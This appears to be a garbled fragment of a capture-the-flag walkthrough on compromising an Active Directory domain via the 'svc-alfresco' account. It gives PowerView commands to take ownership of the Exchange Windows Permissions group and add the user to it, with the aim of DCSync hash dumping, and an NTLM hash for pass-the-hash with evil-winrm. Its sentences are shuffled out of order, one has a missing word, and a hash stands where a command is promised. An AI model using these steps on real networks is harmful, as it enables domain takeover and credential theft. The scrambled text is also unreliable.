The known attack: privilege on the Exchange Windows Permissions group.
    whoami /all
    net user svc-alfresco

We see the user belongs to Service Accounts and Privileged IT Accounts, but more importantly, we need to check group memberships recursively. Upload SharpHound.exe or use BloodHound.py from Kali:
    aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90f43dfa1e816ec0a1c8

Use evil-winrm again with the administrator hash:
If you are searching for the , you have come to the right place. We will cover enumeration, AS-REP roasting, cracking hashes, WinRM access, and finally abusing WriteOwner privileges to compromise the domain.
    Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Member "svc-alfresco"
    Get-DomainGroupMember -Identity "Exchange Windows Permissions"
    # Upload PowerView.ps1
    upload /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1
    Import-Module .\powerview.ps1
    # Take ownership of the group
    Set-DomainObjectOwner -Identity "Exchange Windows Permissions" -OwnerIdentity "svc-alfresco"

Step 5: Grant DCSync Rights

Now that we own the group, we can add ourselves to it. Then, we abuse DCSync to dump domain hashes.
From BloodHound, we see that svc-alfresco has WriteOwner on Exchange Windows Permissions. Use PowerView (upload via WinRM) or net commands: